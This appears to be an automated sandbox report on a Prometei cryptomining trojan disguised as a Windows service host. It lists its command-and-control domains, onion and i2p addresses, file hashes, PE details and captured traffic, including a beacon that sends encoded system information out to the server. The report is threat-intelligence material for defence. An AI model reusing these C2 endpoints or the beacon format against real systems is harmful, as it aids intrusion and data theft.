Name	IP	Active	Malicious	Antivirus Detection	Reputation
p1.feefreepool.net	88.198.246.242	true	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271	true	Avira URL Cloud: safe	unknown
http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJb	sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi	zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	true	Avira URL Cloud: safe	unknown
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifier	sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiW	sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpj	zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	true	Avira URL Cloud: safe	unknown
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi	zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	true	Avira URL Cloud: safe	unknown
http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710003	sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://p1.feefreepool.net/cgi-bin/prometei.cgiexe	sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://p1.feefreepool.net/cgi-bin/prometei.cgi	zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	true	Avira URL Cloud: safe	unknown
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi	zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	true	Avira URL Cloud: safe	unknown
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD	sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
88.198.246.242	p1.feefreepool.net	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	373955
Start date:	23.03.2021
Start time:	14:07:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	zsvc.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@69/5@2/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.64.90.137, 104.42.151.234, 104.43.139.144, 51.11.168.160, 95.100.54.203, 20.54.26.129, 13.88.21.125, 23.0.174.200, 23.0.174.185, 20.50.102.62, 23.10.249.26, 23.10.249.43 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:07:55	API Interceptor	1045x Sleep call for process: sqhost.exe modified
14:08:05	API Interceptor	2x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.198.246.242	3V9alTXIli	Get hash	malicious	Browse	p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
	promet16	Get hash	malicious	Browse	p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
	promet15	Get hash	malicious	Browse	p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
	promet2	Get hash	malicious	Browse	p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
	EKbGofM1r6	Get hash	malicious	Browse	p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
p1.feefreepool.net	3V9alTXIli	Get hash	malicious	Browse	88.198.246.242
	promet16	Get hash	malicious	Browse	88.198.246.242
	promet15	Get hash	malicious	Browse	88.198.246.242
	promet2	Get hash	malicious	Browse	88.198.246.242
	EKbGofM1r6	Get hash	malicious	Browse	88.198.246.242

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	tp007aVv7M.exe	Get hash	malicious	Browse	88.99.66.31
	TwcfXC0O1i.exe	Get hash	malicious	Browse	195.201.225.248
	tp007aVv7M.exe	Get hash	malicious	Browse	88.99.66.31
	AHi0Cpu7qQ.exe	Get hash	malicious	Browse	195.201.225.248
	L1Zx7vxPkv.exe	Get hash	malicious	Browse	88.99.66.31
	sMltm4J5LW.exe	Get hash	malicious	Browse	195.201.225.248
	rAMyXCnC4h.exe	Get hash	malicious	Browse	88.99.66.31
	9WojZ3Q0sH.exe	Get hash	malicious	Browse	195.201.225.248
	yx8DBT3r5r.exe	Get hash	malicious	Browse	136.243.138.29
	still.exe	Get hash	malicious	Browse	135.181.187.43
	VmSdHCbFfl.exe	Get hash	malicious	Browse	88.99.66.31
	12Ufa95sAw.exe	Get hash	malicious	Browse	88.99.66.31
	mcRrjT7JMX.exe	Get hash	malicious	Browse	135.181.121.237
	dkmhyAXru7.exe	Get hash	malicious	Browse	88.99.66.31
	PAYMENT_.exe	Get hash	malicious	Browse	188.40.21.44
	7hmnnRZchJ.exe	Get hash	malicious	Browse	88.99.66.31
	9MyoOYNXKe.exe	Get hash	malicious	Browse	88.99.66.31
	iz8AtqlQeh.exe	Get hash	malicious	Browse	88.99.66.31
	dd7211d8c5d8b0e6290b9eb79787d64b73a91bde129cc.exe	Get hash	malicious	Browse	88.99.66.31
	0XzEd3qwnn.exe	Get hash	malicious	Browse	88.99.66.31

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\zsvc.exe Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	7.8762606428399815
Encrypted:	false
SSDEEP:	3072:WfaJb/HHzTGsbVY6XfRPLlv3vJMiGndRRBmRKuvZVWrMeX7Y1:Tb/HzTXPJR3v9Gn3X8KsYr7Y
MD5:	84452E3633C40030E72C9375C8A3CACB
SHA1:	FE65853FF86E5783C3D70EDCBE0771447967AB0C
SHA-256:	F0A5B257F16C4CCFF520365EBC143F09CCF233E642BF540B5B90A2BBDB43D5B4
SHA-512:	519B8AF4E4F1BCA640B009307FB1528D617C7E00E06159FE30390C80B016F6E34B1391E367953E127D40C70CCB65DA8C5AB5D311E6AEFE7F2F3EE7DE2B4AEC7B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V...j...j...j...B..j..T;Z..j.......j..T;d.Ej..T;e..j.......j...j..j...8`..j...8^..j...j...j...8[..j..Rich.j..........PE..d.....Q`..........#......P........&.0.(...&....@..............................(........... ...................................................(.......(.......(..*..................................................x.(.p...........................................UPX0......&.............................UPX1.....P....&..H..................@....rsrc.........(......L..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!.$..

C:\Windows\zsvc.exe:Zone.Identifier Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\ConDrv Download File
Process:	C:\Windows\System32\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.073210744553412
Encrypted:	false
SSDEEP:	3:4KFXczF5c2WMMABGVcMv:lXczF5jWMacu
MD5:	656D246C6CE9A47F07EC793B6BB27F07
SHA1:	0C098838274F64DBB02500A68B855E6703DDDAF1
SHA-256:	77429FFF9C65F96BC190C4C14916423F0196A2A570970A095285364743172AF4
SHA-512:	9E47C89948CF63770F5E59B793B8625364C9F9B679B80B9CD821ABC9866C0BC23608AEEE9794AC45E547FF11BBD47DA7BDA640D72218507EE2FA9382A9419476
Malicious:	false
Preview:	..No rules match the specified criteria.....

Static File Info

General
File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.8762606428399815
TrID:	Win64 Executable GUI (202006/5) 81.26% UPX compressed Win32 Executable (30571/9) 12.30% Win64 Executable (generic) (12005/4) 4.83% Generic Win/DOS Executable (2004/3) 0.81% DOS Executable Generic (2002/1) 0.81%
File name:	zsvc.exe
File size:	152576
MD5:	84452e3633c40030e72c9375c8a3cacb
SHA1:	fe65853ff86e5783c3d70edcbe0771447967ab0c
SHA256:	f0a5b257f16c4ccff520365ebc143f09ccf233e642bf540b5b90a2bbdb43d5b4
SHA512:	519b8af4e4f1bca640b009307fb1528d617c7e00e06159fe30390c80b016f6e34b1391e367953e127d40c70ccb65da8c5ab5d311e6aefe7f2f3ee7de2b4aec7b
SSDEEP:	3072:WfaJb/HHzTGsbVY6XfRPLlv3vJMiGndRRBmRKuvZVWrMeX7Y1:Tb/HzTXPJR3v9Gn3X8KsYr7Y
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V....j...j...j....B..j..T;Z..j.......j..T;d.Ej..T;e..j.......j...j...j...8`..j...8^..j...j...j...8[..j..Rich.j..........PE..d..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x14128d530
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, HIGH_ENTROPY_VA
Time Stamp:	0x60510FF1 [Tue Mar 16 20:07:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	85a416bf227976ca19a20a4bd883157c

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFFDBAC5h]
dec eax
lea edi, dword ptr [esi-01268000h]
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007F5F6C80E8E5h
add ebx, ebx
je 00007F5F6C80E894h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007F5F6C80E8B3h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007F5F6C80E8ADh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007F5F6C80E881h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007F5F6C80E8A2h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007F5F6C80E882h
rep ret
cld
inc ecx
pop ebx
jmp 00007F5F6C80E89Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007F5F6C80E89Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007F5F6C80E878h
lea eax, dword ptr [ecx+01h]
jmp 00007F5F6C80E899h
dec eax
inc ecx
call ebx
adc eax, eax
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007F5F6C80E89Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007F5F6C80E876h
sub eax, 03h
jc 00007F5F6C80E8ABh
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi
xor eax, FFFFFFFFh
je 00007F5F6C80E8EAh
sar eax, 1

Rich Headers

Programming Language:

[RES] VS2013 build 21005
[LNK] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x128e51c	0x2b8	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x128e000	0x51c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1281000	0x2a90	UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x128d778	0x70	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x1268000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x1269000	0x25000	0x24800	False	0.940998234161	data	7.89809065736	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x128e000	0x1000	0x800	False	0.45263671875	data	4.22618252979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x128e0a4	0x2f4	data	English	United States
RT_MANIFEST	0x128e39c	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
ADVAPI32.dll	OpenProcessToken
CRYPT32.dll	CryptDecodeObjectEx
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ole32.dll	CoUninitialize
OLEAUT32.dll	SysAllocString
PSAPI.DLL	EnumProcesses
SHELL32.dll	ShellExecuteA
USER32.dll	wsprintfA
wevtapi.dll	EvtRender
WS2_32.dll	__WSAFDIsSet

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2016
InternalName	sqhost.exe
FileVersion	2.0.0.0
CompanyName	Microsoft Corporation
ProductName	sqhost.exe
ProductVersion	2.0.0.0
FileDescription	Host Process for Windows Service
OriginalFilename	sqhost.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 23, 2021 14:07:56.375312090 CET	49707	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:07:56.396594048 CET	80	49707	88.198.246.242	192.168.2.3
Mar 23, 2021 14:07:56.396743059 CET	49707	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:07:56.396919012 CET	49707	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:07:56.468348026 CET	80	49707	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:04.421644926 CET	80	49707	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:04.422136068 CET	80	49707	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:04.422231913 CET	49707	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:04.441343069 CET	49707	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:04.464869976 CET	80	49707	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:09.709420919 CET	49714	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:09.730603933 CET	80	49714	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:09.731333971 CET	49714	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:09.731378078 CET	49714	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:09.803414106 CET	80	49714	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:22.899101973 CET	80	49714	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:22.899607897 CET	80	49714	88.198.246.242	192.168.2.3
Mar 23, 2021 14:08:22.899715900 CET	49714	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:25.441411972 CET	49714	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:08:25.462812901 CET	80	49714	88.198.246.242	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 23, 2021 14:07:40.082186937 CET	50620	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:40.096031904 CET	53	50620	8.8.8.8	192.168.2.3
Mar 23, 2021 14:07:40.852046967 CET	64938	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:40.864809990 CET	53	64938	8.8.8.8	192.168.2.3
Mar 23, 2021 14:07:56.114794970 CET	60152	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:56.127768040 CET	53	60152	8.8.8.8	192.168.2.3
Mar 23, 2021 14:07:56.356839895 CET	57544	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:56.369887114 CET	53	57544	8.8.8.8	192.168.2.3
Mar 23, 2021 14:07:57.101492882 CET	55984	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:57.114363909 CET	53	55984	8.8.8.8	192.168.2.3
Mar 23, 2021 14:07:57.220973015 CET	55985	80	192.168.2.3	88.198.246.242
Mar 23, 2021 14:07:57.860291958 CET	64185	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:57.872986078 CET	53	64185	8.8.8.8	192.168.2.3
Mar 23, 2021 14:07:58.851062059 CET	65110	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:07:58.863910913 CET	53	65110	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:02.588650942 CET	58361	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:02.603535891 CET	53	58361	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:04.987948895 CET	63492	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:05.001924992 CET	53	63492	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:05.976211071 CET	60831	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:05.989204884 CET	53	60831	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:09.693305969 CET	60100	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:09.707644939 CET	53	60100	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:12.228287935 CET	53195	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:12.241210938 CET	53	53195	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:16.937810898 CET	50141	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:16.956253052 CET	53	50141	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:18.329224110 CET	53023	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:18.344491005 CET	53	53023	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:18.450423002 CET	49563	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:18.477480888 CET	53	49563	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:19.135514021 CET	51352	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:19.148343086 CET	53	51352	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:27.270322084 CET	59349	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:27.284882069 CET	53	59349	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:36.195553064 CET	57084	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:36.214431047 CET	53	57084	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:45.561541080 CET	58823	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:45.575577974 CET	53	58823	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:46.761060953 CET	57568	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:46.779449940 CET	53	57568	8.8.8.8	192.168.2.3
Mar 23, 2021 14:08:58.877156019 CET	50540	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:08:58.889822006 CET	53	50540	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:00.352343082 CET	54366	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:00.365499020 CET	53	54366	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:01.377211094 CET	53034	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:01.390403032 CET	53	53034	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:11.982743979 CET	57762	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:11.995361090 CET	53	57762	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:13.028187037 CET	55435	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:13.041990995 CET	53	55435	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:18.379707098 CET	50713	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:18.392725945 CET	53	50713	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:18.439229012 CET	56132	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:18.451982021 CET	53	56132	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:19.074630976 CET	58987	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:19.108567953 CET	53	58987	8.8.8.8	192.168.2.3
Mar 23, 2021 14:09:19.424052954 CET	56579	53	192.168.2.3	8.8.8.8
Mar 23, 2021 14:09:19.437227964 CET	53	56579	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 23, 2021 14:07:56.356839895 CET	192.168.2.3	8.8.8.8	0x595c	Standard query (0)	p1.feefreepool.net	A (IP address)	IN (0x0001)
Mar 23, 2021 14:08:09.693305969 CET	192.168.2.3	8.8.8.8	0x13d1	Standard query (0)	p1.feefreepool.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 23, 2021 14:07:56.369887114 CET	8.8.8.8	192.168.2.3	0x595c	No error (0)	p1.feefreepool.net		88.198.246.242	A (IP address)	IN (0x0001)
Mar 23, 2021 14:08:09.707644939 CET	8.8.8.8	192.168.2.3	0x13d1	No error (0)	p1.feefreepool.net		88.198.246.242	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

p1.feefreepool.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	88.198.246.242	80	C:\Windows\sqhost.exe

Timestamp	kBytes transferred	Direction	Data
Mar 23, 2021 14:07:56.396919012 CET	1073	OUT	GET /cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 HTTP/1.0 Host: p1.feefreepool.net
Mar 23, 2021 14:08:04.421644926 CET	1138	IN	HTTP/1.1 200 OK Date: Tue, 23 Mar 2021 13:08:06 GMT Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6 Content-Length: 7 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 73 79 73 69 6e 66 6f Data Ascii: sysinfo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49714	88.198.246.242	80	C:\Windows\sqhost.exe

Timestamp	kBytes transferred	Direction	Data
